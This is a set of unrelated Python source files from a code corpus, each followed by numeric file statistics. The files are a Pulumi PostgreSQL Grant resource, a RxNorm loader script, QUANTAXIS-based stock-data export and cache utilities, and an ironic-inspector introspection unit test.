with_grant_option: Optional[pulumi.Input[bool]] = None) -> 'Grant':
"""
Get an existing Grant resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database: The database to grant privileges on for this role.
:param pulumi.Input[str] object_type: The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
:param pulumi.Input[Sequence[pulumi.Input[str]]] objects: The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] privileges: The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
:param pulumi.Input[str] role: The name of the role to grant privileges on, Set it to "public" for all roles.
:param pulumi.Input[str] schema: The database schema to grant privileges on for this role (Required except if object_type is "database")
:param pulumi.Input[bool] with_grant_option: Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GrantState.__new__(_GrantState)
__props__.__dict__["database"] = database
__props__.__dict__["object_type"] = object_type
__props__.__dict__["objects"] = objects
__props__.__dict__["privileges"] = privileges
__props__.__dict__["role"] = role
__props__.__dict__["schema"] = schema
__props__.__dict__["with_grant_option"] = with_grant_option
return Grant(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
The database to grant privileges on for this role.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter(name="objectType")
def object_type(self) -> pulumi.Output[str]:
"""
The PostgreSQL object type to grant the privileges on (one of: database, schema, table, sequence, function, foreign_data_wrapper, foreign_server).
"""
return pulumi.get(self, "object_type")
@property
@pulumi.getter
def objects(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The objects upon which to grant the privileges. An empty list (the default) means to grant permissions on *all* objects of the specified type. You cannot specify this option if the `object_type` is `database` or `schema`.
"""
return pulumi.get(self, "objects")
@property
@pulumi.getter
def privileges(self) -> pulumi.Output[Sequence[str]]:
"""
The list of privileges to grant. There are different kinds of privileges: SELECT, INSERT, UPDATE, DELETE, TRUNCATE, REFERENCES, TRIGGER, CREATE, CONNECT, TEMPORARY, EXECUTE, and USAGE. An empty list could be provided to revoke all privileges for this role.
"""
return pulumi.get(self, "privileges")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The name of the role to grant privileges on, Set it to "public" for all roles.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter
def schema(self) -> pulumi.Output[Optional[str]]:
"""
The database schema to grant privileges on for this role (Required except if object_type is "database")
"""
return pulumi.get(self, "schema")
@property
@pulumi.getter(name="withGrantOption")
def with_grant_option(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the recipient of these privileges can grant the same privileges to others. Defaults to false.
"""
return pulumi.get(self, "with_grant_option")
| 47.343137 | 325 | 0.651149 | 2,939 | 24,145 | 5.192923 | 0.071793 | 0.08721 | 0.073385 | 0.03892 | 0.888547 | 0.867776 | 0.849692 | 0.830166 | 0.826825 | 0.822238 | 0 | 0.000386 | 0.248664 | 24,145 | 509 | 326 | 47.436149 | 0.840913 | 0.437399 | 0 | 0.700758 | 1 | 0 | 0.081083 | 0.002291 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159091 | false | 0.003788 | 0.018939 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d77d01b6984286b9fb8b20b94311609866ad1123 | 100 | py | Python | data-acquisition/data-synthesizer/src/data_synthesizer/__init__.py | tejasmhos/clomask | 49954f1c1aa8efa775fd8f509287de93c01f2ccc | [
"MIT"
] | 8 | 2019-03-22T19:48:33.000Z | 2019-08-31T06:38:58.000Z | data-acquisition/data-synthesizer/src/data_synthesizer/__init__.py | tejasmhos/clomask | 49954f1c1aa8efa775fd8f509287de93c01f2ccc | [
"MIT"
] | 31 | 2018-10-25T09:33:13.000Z | 2021-08-25T15:29:08.000Z | data-acquisition/data-synthesizer/src/data_synthesizer/__init__.py | tejasmhos/clomask | 49954f1c1aa8efa775fd8f509287de93c01f2ccc | [
"MIT"
] | 5 | 2018-11-02T19:52:47.000Z | 2020-04-15T04:27:37.000Z | from .data_synthesizer import DataSynthesizer
from .data_synthesizer import ParallelDataSynthesizer
| 33.333333 | 53 | 0.9 | 10 | 100 | 8.8 | 0.6 | 0.181818 | 0.431818 | 0.568182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 100 | 2 | 54 | 50 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ad2a82d7b7b6158b5b830fb2f2d775dd6913c467 | 43 | py | Python | backend/api/decorators/__init__.py | cellador/vivid-streets | 25c641e13c9bd00987a8bffe893daecb53b1689a | [
"MIT"
] | null | null | null | backend/api/decorators/__init__.py | cellador/vivid-streets | 25c641e13c9bd00987a8bffe893daecb53b1689a | [
"MIT"
] | 14 | 2020-03-22T13:00:22.000Z | 2020-04-11T19:45:55.000Z | backend/api/decorators/__init__.py | cellador/vivid-streets | 25c641e13c9bd00987a8bffe893daecb53b1689a | [
"MIT"
] | null | null | null | from .roles_required import roles_required
| 21.5 | 42 | 0.883721 | 6 | 43 | 6 | 0.666667 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a8eb69db27a68ec2c39272cd983facf176d48ac5 | 347 | py | Python | load/run_local.py | jhajagos/RxNormPrescribePostgreSQL | 5cee5bec3f640cd53319b95a42c4b26655abb1e3 | [
"Apache-2.0"
] | 4 | 2017-03-07T01:41:07.000Z | 2021-08-31T16:59:01.000Z | load/run_local.py | jhajagos/RxNormPrescribePostgreSQL | 5cee5bec3f640cd53319b95a42c4b26655abb1e3 | [
"Apache-2.0"
] | null | null | null | load/run_local.py | jhajagos/RxNormPrescribePostgreSQL | 5cee5bec3f640cd53319b95a42c4b26655abb1e3 | [
"Apache-2.0"
] | 2 | 2019-04-17T13:04:06.000Z | 2020-03-04T16:27:03.000Z | from generate_db_load_script import main
main("scc_pps", "E:\\data\\rxnorm\\RxNorm_full_prescribe_07052016\\rrf\\", "postgres", "", "E:\\Program Files\\PostgreSQL\\9.4\\bin\\psql", rxnorm="rxnorm_prescribe")
main("scc_pps", "E:\\data\\rxnorm\\RxNorm_full_07052016\\rrf\\", "postgres", "",
"E:\\Program Files\\PostgreSQL\\9.4\\bin\\psql") | 69.4 | 166 | 0.688761 | 49 | 347 | 4.653061 | 0.489796 | 0.157895 | 0.087719 | 0.096491 | 0.719298 | 0.719298 | 0.719298 | 0.719298 | 0.447368 | 0.447368 | 0 | 0.062305 | 0.074928 | 347 | 5 | 167 | 69.4 | 0.647975 | 0 | 0 | 0 | 1 | 0 | 0.678161 | 0.477011 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d16b34288410a01d2de15363d8865e512029e821 | 20,574 | py | Python | GolemQ/utils/path.py | wangdecheng/QAStrategy | d970242ea61cff2f1a6f69545dc7f65e8efd1672 | [
"MIT"
] | 76 | 2020-10-14T03:33:47.000Z | 2022-01-25T13:34:05.000Z | GolemQ/utils/path.py | wangdecheng/QAStrategy | d970242ea61cff2f1a6f69545dc7f65e8efd1672 | [
"MIT"
] | 4 | 2020-10-15T09:23:34.000Z | 2021-07-15T04:25:00.000Z | GolemQ/utils/path.py | wangdecheng/QAStrategy | d970242ea61cff2f1a6f69545dc7f65e8efd1672 | [
"MIT"
] | 37 | 2020-10-14T03:35:55.000Z | 2021-12-20T09:58:32.000Z | #
# The MIT License (MIT)
#
# Copyright (c) 2018-2020 azai/Rgveda/GolemQuant
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
这里定义的是一些本地目录
"""
import os
import datetime
try:
import QUANTAXIS as QA
from QUANTAXIS.QAUtil.QAParameter import ORDER_DIRECTION
from QUANTAXIS.QAData.QADataStruct import (
QA_DataStruct_Index_min,
QA_DataStruct_Index_day,
QA_DataStruct_Stock_day,
QA_DataStruct_Stock_min,
QA_DataStruct_CryptoCurrency_day,
QA_DataStruct_CryptoCurrency_min,
)
from QUANTAXIS.QAIndicator.talib_numpy import *
from QUANTAXIS.QAUtil.QADate_Adv import (
QA_util_timestamp_to_str,
QA_util_datetime_to_Unix_timestamp,
QA_util_print_timestamp
)
from QUANTAXIS.QAUtil.QALogs import (
QA_util_log_info,
QA_util_log_debug,
QA_util_log_expection)
from QUANTAXIS.QAFetch.QAhuobi import (
FIRST_PRIORITY,
)
except:
print('PLEASE run "pip install QUANTAXIS" before call GolemQ.utils.path modules')
pass
"""创建本地文件夹
1. setting_path ==> 用于存放配置文件 setting.cfg
2. cache_path ==> 用于存放临时文件
3. log_path ==> 用于存放储存的log
4. download_path ==> 下载的数据/财务文件
5. strategy_path ==> 存放策略模板
6. bin_path ==> 存放一些交易的sdk/bin文件等
"""
basepath = os.getcwd()
path = os.path.expanduser('~')
user_path = '{}{}{}'.format(path, os.sep, '.GolemQ')
#cache_path = os.path.join(user_path, 'datastore', 'cache')
def cache_path(dirname, portable=False):
"""
返回本地用户目录下的'.GolemQ'为根目录的缓存临时文件目录,如果 portable 参数等于 True,
则返回程序代码启动目录为根目录的缓存目录。
"""
if (portable):
ret_cache_path = os.path.join(basepath, 'datastore', 'cache', dirname)
else:
ret_cache_path = os.path.join(user_path, 'datastore', 'cache', dirname)
if not (os.path.exists(ret_cache_path) and \
os.path.isdir(ret_cache_path)):
#print(u'文件夹',dirname,'不存在,重新建立')
#os.mkdir(dirname)
try:
os.makedirs(ret_cache_path)
except:
# 如果目录已经存在,那么可能是并发冲突,当做什么事情都没发生
if not (os.path.exists(ret_cache_path)):
# 否则继续触发异常
os.makedirs(os.path.join(ret_cache_path))
return ret_cache_path
def mkdirs_user(dirname):
if not (os.path.exists(os.path.join(user_path, dirname)) and \
os.path.isdir(os.path.join(user_path, dirname))):
#print(u'文件夹',dirname,'不存在,重新建立')
#os.mkdir(dirname)
try:
os.makedirs(os.path.join(user_path, dirname))
except:
# 如果目录已经存在,那么可能是并发冲突,当做什么事情都没发生
if not (os.path.join(user_path, dirname)):
# 否则继续触发异常
os.makedirs(os.path.join(user_path, dirname))
return os.path.join(user_path, dirname)
def mkdirs(dirname):
if not (os.path.exists(os.path.join(basepath, dirname)) and \
os.path.isdir(os.path.join(basepath, dirname))):
#print(u'文件夹',dirname,'不存在,重新建立')
#os.mkdir(dirname)
try:
os.makedirs(os.path.join(basepath, dirname))
except:
# 如果目录已经存在,那么可能是并发冲突,当做什么事情都没发生
if not (os.path.exists(os.path.join(basepath, dirname))):
# 否则继续触发异常
os.makedirs(os.path.join(basepath, dirname))
return os.path.join(basepath, dirname)
def export_csv_min(code, market_type):
"""
训练用隶属数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
if (market_type == QA.MARKET_TYPE.STOCK_CN):
market_type_alis = 'A股'
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
market_type_alis = '指数'
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
market_type_alis = '数字货币'
#print(u'{} 开始读取{}历史数据'.format(QA_util_timestamp_to_str()[2:16],
# market_type_alis),
# code)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),
frequency=frequence))
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
#data_day = QA.QA_fetch_index_day_adv(code,
# '1991-01-01',
# '{}'.format(datetime.date.today(),))
data_day = QA.QA_fetch_index_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),
frequency=frequence))
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequence = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end=QA_util_timestamp_to_str(),
frequence=frequence)
if (data_day is None):
#print('{}没有数据'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.to_csv(os.path.join(export_path, 'index', '{}_{}_kline.csv'.format(code, frequence)))
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.to_csv(os.path.join(export_path, 'stock', '{}_{}_kline.csv'.format(code, frequence)))
return data_day.data
def save_hdf_min(code, market_type, export_path='export', features=None):
"""
训练用隶属特征数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
if (features is None):
#print('{}没有数据'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
features.to_hdf(os.path.join(export_path, 'index', '{}_{}_features.hdf'.format(code, frequence)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
features.to_hdf(os.path.join(export_path, 'stock', '{}_{}_features.hdf'.format(code, frequence)), key='df', mode='w')
return features
def export_hdf_min(code, market_type, export_path='export', features=None):
"""
训练用隶属数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
if (market_type == QA.MARKET_TYPE.STOCK_CN):
market_type_alis = 'A股'
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
market_type_alis = '指数'
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
market_type_alis = '数字货币'
#print(u'{} 开始读取{}历史数据'.format(QA_util_timestamp_to_str()[2:16],
# market_type_alis),
# code)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today()),
frequence=frequence)
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
#data_day = QA.QA_fetch_index_day_adv(code,
# '1991-01-01',
# '{}'.format(datetime.date.today(),))
data_day = QA.QA_fetch_index_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today()),
frequence=frequence)
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequence = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end='{}'.format(datetime.date.today()),
frequence=frequence)
if (data_day is None):
#print('{}没有数据'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.to_hdf(os.path.join(export_path, 'index', '{}_{}_kline.hdf'.format(code, frequence)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.to_hdf(os.path.join(export_path, 'stock', '{}_{}_kline.hdf'.format(code, frequence)), key='df', mode='w')
return data_day.data
def export_csv_day(code, market_type=None, export_path='export'):
"""
训练用隶属数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
if (market_type == QA.MARKET_TYPE.STOCK_CN):
market_type_alis = 'A股'
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
market_type_alis = '指数'
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
market_type_alis = '数字货币'
print(u'{} 开始读取{}历史数据'.format(QA_util_timestamp_to_str()[2:16],
market_type_alis),
code)
#data_day = QA.QA_fetch_stock_min_adv(codelist,
# '2018-11-01',
# '{}'.format(datetime.date.today()),
# frequence=frequence)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_day_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),)).to_qfq()
if (np.isnan(data_day).any() == True):
# 在下载数据的时候,有时候除权后莫名其妙丢数据了,我只能拿没除权的数据补
predict_null = pd.isnull(data_day.data[AKA.CLOSE])
data_null = data_day.data[predict_null == True]
data_day.data.loc[data_null.index, :] = QA.QA_fetch_stock_day_adv(code,
'{}'.format(data_null.index.get_level_values(level=0).values[0]),
'{}'.format(datetime.date.today(),)).data
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
data_day = QA.QA_fetch_index_day_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),))
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequency = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end=QA_util_timestamp_to_str(),
frequence=frequency)
if (data_day is None):
print('{}没有数据'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.drop(['date_stamp','down_count','up_count'], axis=1).to_csv(os.path.join(export_path, 'index', '{}.csv'.format(code)))
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.drop(['adj'], axis=1).to_csv(os.path.join(export_path, 'stock', '{}.csv'.format(code)))
return data_day.data
def export_hdf_day(code, market_type=None, export_path='export', features=None):
"""
训练用隶属数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
if (market_type == QA.MARKET_TYPE.STOCK_CN):
market_type_alis = 'A股'
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
market_type_alis = '指数'
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
market_type_alis = '数字货币'
print(u'{} 开始读取{}历史数据'.format(QA_util_timestamp_to_str()[2:16],
market_type_alis),
code)
#data_day = QA.QA_fetch_stock_min_adv(codelist,
# '2018-11-01',
# '{}'.format(datetime.date.today()),
# frequence=frequence)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_day_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),)).to_qfq()
if (np.isnan(data_day).any() == True):
# 在下载数据的时候,有时候除权后莫名其妙丢数据了,我只能拿没除权的数据补
predict_null = pd.isnull(data_day.data[AKA.CLOSE])
data_null = data_day.data[predict_null == True]
data_day.data.loc[data_null.index, :] = QA.QA_fetch_stock_day_adv(code,
'{}'.format(data_null.index.get_level_values(level=0).values[0]),
'{}'.format(datetime.date.today(),)).data
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
data_day = QA.QA_fetch_index_day_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),))
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequency = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end=QA_util_timestamp_to_str(),
frequence=frequency)
if (data_day is None):
print('{}没有数据'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.drop(['date_stamp','down_count','up_count'], axis=1).to_hdf(os.path.join(export_path, 'index', '{}.hdf'.format(code)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.drop(['adj'], axis=1).to_hdf(os.path.join(export_path, 'stock', '{}.hdf'.format(code)), key='df', mode='w')
return data_day.data
def export_hdf_metadata(export_path, code, frequence='60min', metadata=None):
"""
训练用隶属特征数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
if (metadata is None):
#print('{}没有数据'.format(code))
pass
else:
print(os.path.join(export_path, '{}_{}.hdf5'.format(code, frequence)),
metadata.tail(10))
#metadata.to_hdf(os.path.join(export_path, '{}_{}.hdf5'.format(code,
#frequence)), key='df', mode='w')
metadata.to_pickle(os.path.join(export_path, '{}_{}.hdf5'.format(code, frequence)))
return metadata
def export_metadata_to_pickle(export_path, code, frequence='60min', metadata=None):
"""
训练用隶属特征数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
if (metadata is None):
#print('{}没有数据'.format(code))
pass
else:
print(os.path.join(export_path, '{}_{}.pickle'.format(code, frequence)),
metadata.tail(3))
#metadata.to_hdf(os.path.join(export_path, '{}_{}.hdf5'.format(code,
#frequence)), key='df', mode='w')
metadata.to_pickle(os.path.join(export_path, '{}_{}.pickle'.format(code, frequence)))
return metadata
def import_metadata_from_pickle(export_path, code, frequence='60min'):
if (isinstance(code, list)):
code = code[0]
print(os.path.join(export_path, '{}_{}.pickle'.format(code, frequence)))
metadata = pd.read_pickle(os.path.join(export_path, '{}_{}.pickle'.format(code, frequence)))
return metadata
def save_hdf_min(code, market_type, export_path='export', features=None):
"""
训练用隶属特征数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
if (features is None):
#print('{}没有数据'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
features.to_hdf(os.path.join(export_path, 'index', '{}_{}_features.hdf'.format(code, frequence)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
features.to_hdf(os.path.join(export_path, 'stock', '{}_{}_features.hdf'.format(code, frequence)), key='df', mode='w')
return features
def export_hdf_min(code, market_type, export_path='export', features=None):
"""
训练用隶属数据导出模块
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
if (market_type == QA.MARKET_TYPE.STOCK_CN):
market_type_alis = 'A股'
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
market_type_alis = '指数'
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
market_type_alis = '数字货币'
#print(u'{} 开始读取{}历史数据'.format(QA_util_timestamp_to_str()[2:16],
# market_type_alis),
# code)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today()),
frequence=frequence)
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
#data_day = QA.QA_fetch_index_day_adv(code,
# '1991-01-01',
# '{}'.format(datetime.date.today(),))
data_day = QA.QA_fetch_index_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today()),
frequence=frequence)
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequence = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end='{}'.format(datetime.date.today()),
frequence=frequence)
if (data_day is None):
#print('{}没有数据'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.to_hdf(os.path.join(export_path, 'index', '{}_{}_kline.hdf'.format(code, frequence)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.to_hdf(os.path.join(export_path, 'stock', '{}_{}_kline.hdf'.format(code, frequence)), key='df', mode='w')
return data_day.data
def load_cache(filename='cache.pickle'):
filename = filename.replace(' ', '_').replace(':', '_')
metadata = pd.read_pickle(os.path.join(mkdirs(os.path.join('cache')), filename))
return metadata
def save_cache(filename='cache.pickle', metadata=None):
filename = filename.replace(' ', '_').replace(':', '_')
metadata = metadata.to_pickle(os.path.join(mkdirs(os.path.join('cache')), filename))
return filename
def load_snapshot_cache(dirpath, filename='cache.pickle'):
filename = filename.replace(' ', '_').replace(':', '_')
metadata = pd.read_pickle(os.path.join(mkdirs(dirpath), filename))
return metadata
def save_snapshot_cache(dirpath, filename='cache.pickle', metadata=None):
filename = filename.replace(' ', '_').replace(':', '_')
metadata = metadata.to_pickle(os.path.join(mkdirs(dirpath), filename))
return os.path.join(mkdirs(dirpath), filename) | 40.341176 | 160 | 0.573588 | 2,455 | 20,574 | 4.573523 | 0.115275 | 0.102423 | 0.052547 | 0.070538 | 0.817599 | 0.803082 | 0.781617 | 0.765764 | 0.741806 | 0.706003 | 0 | 0.016452 | 0.29095 | 20,574 | 510 | 161 | 40.341176 | 0.753222 | 0.166278 | 0 | 0.753125 | 0 | 0 | 0.061932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053125 | false | 0.03125 | 0.03125 | 0 | 0.1375 | 0.028125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f164c3d409b929fec6ba38e1d647294ccbf0f55 | 23,187 | py | Python | ironic_inspector/test/unit/test_introspect.py | gudrutis/ironic-inspector | a2c2b70d973c87b26a4d168c43203b5091bbb9f7 | [
"Apache-2.0"
] | null | null | null | ironic_inspector/test/unit/test_introspect.py | gudrutis/ironic-inspector | a2c2b70d973c87b26a4d168c43203b5091bbb9f7 | [
"Apache-2.0"
] | null | null | null | ironic_inspector/test/unit/test_introspect.py | gudrutis/ironic-inspector | a2c2b70d973c87b26a4d168c43203b5091bbb9f7 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import time
import fixtures
from ironicclient import exceptions
import mock
from oslo_config import cfg
from ironic_inspector.common import ironic as ir_utils
from ironic_inspector import introspect
from ironic_inspector import introspection_state as istate
from ironic_inspector import node_cache
from ironic_inspector.pxe_filter import base as pxe_filter
from ironic_inspector.test import base as test_base
from ironic_inspector import utils
CONF = cfg.CONF
class BaseTest(test_base.NodeTest):
def setUp(self):
super(BaseTest, self).setUp()
introspect._LAST_INTROSPECTION_TIME = 0
self.node.power_state = 'power off'
self.ports = [mock.Mock(address=m) for m in self.macs]
self.ports_dict = collections.OrderedDict((p.address, p)
for p in self.ports)
self.node_info = mock.Mock(uuid=self.uuid, options={})
self.node_info.ports.return_value = self.ports_dict
self.node_info.node.return_value = self.node
driver_fixture = self.useFixture(fixtures.MockPatchObject(
pxe_filter, 'driver', autospec=True))
driver_mock = driver_fixture.mock.return_value
self.sync_filter_mock = driver_mock.sync
def _prepare(self, client_mock):
cli = client_mock.return_value
cli.node.get.return_value = self.node
cli.node.validate.return_value = mock.Mock(power={'result': True})
return cli
@mock.patch.object(node_cache, 'start_introspection', autospec=True)
@mock.patch.object(ir_utils, 'get_client', autospec=True)
class TestIntrospect(BaseTest):
def test_ok(self, client_mock, start_mock):
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
cli.node.validate.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
self.node_info.ports.assert_called_once_with()
self.node_info.add_attribute.assert_called_once_with('mac',
self.macs)
self.sync_filter_mock.assert_called_with(cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
